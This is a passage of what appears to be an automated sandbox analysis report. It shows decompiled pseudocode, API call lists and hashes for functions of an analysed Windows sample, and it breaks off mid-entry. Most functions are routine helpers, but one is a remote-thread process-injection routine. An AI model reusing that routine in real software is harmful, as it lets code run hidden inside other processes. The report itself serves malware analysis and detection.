                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2754987064-0
                                                                                                                            • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                            • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                            • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                            • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                                                            0x00408dd0
                                                                                                                            0x00408dd2
                                                                                                                            0x00408de2
                                                                                                                            0x00408df4
                                                                                                                            0x00408e01
                                                                                                                            0x00408e1b
                                                                                                                            0x00408e21
                                                                                                                            0x00408e28
                                                                                                                            0x00408e30
                                                                                                                            0x00408dd4
                                                                                                                            0x00408dd8
                                                                                                                            0x00408dd8

                                                                                                                            APIs
                                                                                                                            • memcpy.MSVCRT ref: 00408DE2
                                                                                                                            • memcpy.MSVCRT ref: 00408DF4
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
                                                                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_00008ADB,00000000), ref: 00408E1B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1386444988-0
                                                                                                                            • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                            • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                                            • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                                            • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                                                            0x004050e1
                                                                                                                            0x004050ec
                                                                                                                            0x004050ee
                                                                                                                            0x004050f5
                                                                                                                            0x004050ff
                                                                                                                            0x00405114
                                                                                                                            0x00405118
                                                                                                                            0x00405123
                                                                                                                            0x00405128
                                                                                                                            0x00405101
                                                                                                                            0x00405109
                                                                                                                            0x0040510f
                                                                                                                            0x0040512e

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcslen$wcscatwcsncat
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 291873006-0
                                                                                                                            • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                            • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                                            • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                                            • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                                                            0x00402de0
                                                                                                                            0x00402de2
                                                                                                                            0x00402dec
                                                                                                                            0x00402def
                                                                                                                            0x00402dfb
                                                                                                                            0x00402e0c
                                                                                                                            0x00402e0e
                                                                                                                            0x00402e0e
                                                                                                                            0x00402e16
                                                                                                                            0x00402e18
                                                                                                                            0x00402e1a
                                                                                                                            0x00402e21

                                                                                                                            APIs
                                                                                                                            • GetClientRect.USER32 ref: 00402DEF
                                                                                                                            • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                            • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                              • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                                              • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Rect$ClientPoints
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4235085887-0
                                                                                                                            • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                            • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                                                            • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                                                            • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 72%
                                                                                                                            			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                                                            0x0040b6a6
                                                                                                                            0x0040b6ad
                                                                                                                            0x0040b6af
                                                                                                                            0x0040b6b0
                                                                                                                            0x0040b6b5
                                                                                                                            0x0040b6b6
                                                                                                                            0x0040b6bd
                                                                                                                            0x0040b6bf
                                                                                                                            0x0040b6c0
                                                                                                                            0x0040b6c5
                                                                                                                            0x0040b6c6
                                                                                                                            0x0040b6cd
                                                                                                                            0x0040b6cf
                                                                                                                            0x0040b6d0
                                                                                                                            0x0040b6d5
                                                                                                                            0x0040b6d6
                                                                                                                            0x0040b6dd
                                                                                                                            0x0040b6df
                                                                                                                            0x0040b6e0
                                                                                                                            0x00000000
                                                                                                                            0x0040b6e5
                                                                                                                            0x0040b6e6

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ??3@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 613200358-0
                                                                                                                            • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                            • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                                                            • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                                                            • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 75%
                                                                                                                            			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                                                            0x00407362
                                                                                                                            0x00407369
                                                                                                                            0x0040736e
                                                                                                                            0x00407371
                                                                                                                            0x00407378
                                                                                                                            0x0040737e
                                                                                                                            0x00407381
                                                                                                                            0x00407386
                                                                                                                            0x0040739f
                                                                                                                            0x00407388
                                                                                                                            0x00407391
                                                                                                                            0x00407391
                                                                                                                            0x004073a4
                                                                                                                            0x004073ac
                                                                                                                            0x004073ad
                                                                                                                            0x004073cd
                                                                                                                            0x004073d0
                                                                                                                            0x004073d3
                                                                                                                            0x004073d6
                                                                                                                            0x004073e0
                                                                                                                            0x004073e7
                                                                                                                            0x004073ee
                                                                                                                            0x004073f5
                                                                                                                            0x0040741a
                                                                                                                            0x0040741a
                                                                                                                            0x0040741d
                                                                                                                            0x00407420
                                                                                                                            0x00407423
                                                                                                                            0x00407426
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004073fc
                                                                                                                            0x00407400
                                                                                                                            0x0040740f
                                                                                                                            0x00407412
                                                                                                                            0x00407412
                                                                                                                            0x00407402
                                                                                                                            0x00407402
                                                                                                                            0x00407407
                                                                                                                            0x00407407
                                                                                                                            0x00407413
                                                                                                                            0x00407419
                                                                                                                            0x00407419
                                                                                                                            0x00407419
                                                                                                                            0x0040742f
                                                                                                                            0x00407434
                                                                                                                            0x00407437
                                                                                                                            0x00407439
                                                                                                                            0x0040743b
                                                                                                                            0x0040743b
                                                                                                                            0x0040744e
                                                                                                                            0x00407453
                                                                                                                            0x00407453
                                                                                                                            0x004073af
                                                                                                                            0x004073b2
                                                                                                                            0x004073ba
                                                                                                                            0x004073bb
                                                                                                                            0x00000000
                                                                                                                            0x004073bd
                                                                                                                            0x004073c3
                                                                                                                            0x004073c3
                                                                                                                            0x004073bb
                                                                                                                            0x0040745c
                                                                                                                            0x00407468
                                                                                                                            0x00407468
                                                                                                                            0x0040746d
                                                                                                                            0x00407473
                                                                                                                            0x0040747c
                                                                                                                            0x0040748e

                                                                                                                            APIs
                                                                                                                            • wcschr.MSVCRT ref: 004073A4
                                                                                                                            • wcschr.MSVCRT ref: 004073B2
                                                                                                                              • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                                                              • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: wcschr$memcpywcslen
                                                                                                                            • String ID: "
                                                                                                                            • API String ID: 1983396471-123907689
                                                                                                                            • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                            • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                                                            • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                                                            • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 64%
                                                                                                                            			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                            0x0040a27d
                                                                                                                            0x0040a286
                                                                                                                            0x0040a290
                                                                                                                            0x0040a29d
                                                                                                                            0x00000000
                                                                                                                            0x0040a32f
                                                                                                                            0x0040a29f
                                                                                                                            0x0040a2a4
                                                                                                                            0x0040a2ad
                                                                                                                            0x0040a2b6
                                                                                                                            0x0040a2bc
                                                                                                                            0x0040a2be
                                                                                                                            0x0040a2c4
                                                                                                                            0x0040a2c8
                                                                                                                            0x0040a2ce
                                                                                                                            0x0040a2e3
                                                                                                                            0x0040a2ed
                                                                                                                            0x0040a2fb
                                                                                                                            0x0040a2fe
                                                                                                                            0x0040a305
                                                                                                                            0x0040a30c
                                                                                                                            0x0040a30f
                                                                                                                            0x0040a313
                                                                                                                            0x00000000
                                                                                                                            0x0040a31a
                                                                                                                            0x0040a338

                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32(?,76D268A0,00000000), ref: 0040A290
                                                                                                                            • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                              • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                              • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                            • String ID: $
                                                                                                                            • API String ID: 283512611-3993045852
                                                                                                                            • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                            • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                            • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                            • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 45%
                                                                                                                            			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                            0x00401676
                                                                                                                            0x0040167e
                                                                                                                            0x0040168a
                                                                                                                            0x0040168c
                                                                                                                            0x00401690
                                                                                                                            0x00401691
                                                                                                                            0x00401696
                                                                                                                            0x0040169d
                                                                                                                            0x004016a2
                                                                                                                            0x004016aa
                                                                                                                            0x004016aa
                                                                                                                            0x004016aa
                                                                                                                            0x004016ad
                                                                                                                            0x004016ae
                                                                                                                            0x004016b3
                                                                                                                            0x004016b9
                                                                                                                            0x004016bb
                                                                                                                            0x004016bc
                                                                                                                            0x004016c1
                                                                                                                            0x004016c8
                                                                                                                            0x004016cd
                                                                                                                            0x004016ce
                                                                                                                            0x004016ea
                                                                                                                            0x004016ff
                                                                                                                            0x0040170c
                                                                                                                            0x004016d0
                                                                                                                            0x004016e3
                                                                                                                            0x004016e3
                                                                                                                            0x00401711
                                                                                                                            0x00401714
                                                                                                                            0x00000000
                                                                                                                            0x00401719
                                                                                                                            0x0040171c

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintf
                                                                                                                            • String ID: Line%d$Lines
                                                                                                                            • API String ID: 3988819677-2790224864
                                                                                                                            • Opcode ID: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                            • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                            • Opcode Fuzzy Hash: c1f721086df18e7d6bb8eccb45024a01d2e3fe78f3e8b8c51705c1ae483569b9
                                                                                                                            • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 70%
                                                                                                                            			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                                                            0x00405132
                                                                                                                            0x00405135
                                                                                                                            0x00405139
                                                                                                                            0x0040513e
                                                                                                                            0x00405141
                                                                                                                            0x004051b3
                                                                                                                            0x00405143
                                                                                                                            0x00405145
                                                                                                                            0x00405147
                                                                                                                            0x0040514c
                                                                                                                            0x0040514e
                                                                                                                            0x00405151
                                                                                                                            0x00405151
                                                                                                                            0x0040515b
                                                                                                                            0x0040515c
                                                                                                                            0x0040515d
                                                                                                                            0x0040515e
                                                                                                                            0x0040515f
                                                                                                                            0x00405168
                                                                                                                            0x00405169
                                                                                                                            0x00405171
                                                                                                                            0x00405173
                                                                                                                            0x00405174
                                                                                                                            0x00405182
                                                                                                                            0x00405184
                                                                                                                            0x00405189
                                                                                                                            0x0040518c
                                                                                                                            0x00405194
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00405196
                                                                                                                            0x0040519a
                                                                                                                            0x0040519b
                                                                                                                            0x004051a1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004051a1
                                                                                                                            0x004051a3
                                                                                                                            0x004051a3
                                                                                                                            0x004051a6
                                                                                                                            0x004051af
                                                                                                                            0x004051b0
                                                                                                                            0x004051b7

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000020.00000002.428911775.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000020.00000002.428878775.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428941026.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428965955.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000020.00000002.428985371.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: _snwprintfmemcpy
                                                                                                                            • String ID: %2.2X
                                                                                                                            • API String ID: 2789212964-323797159
                                                                                                                            • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
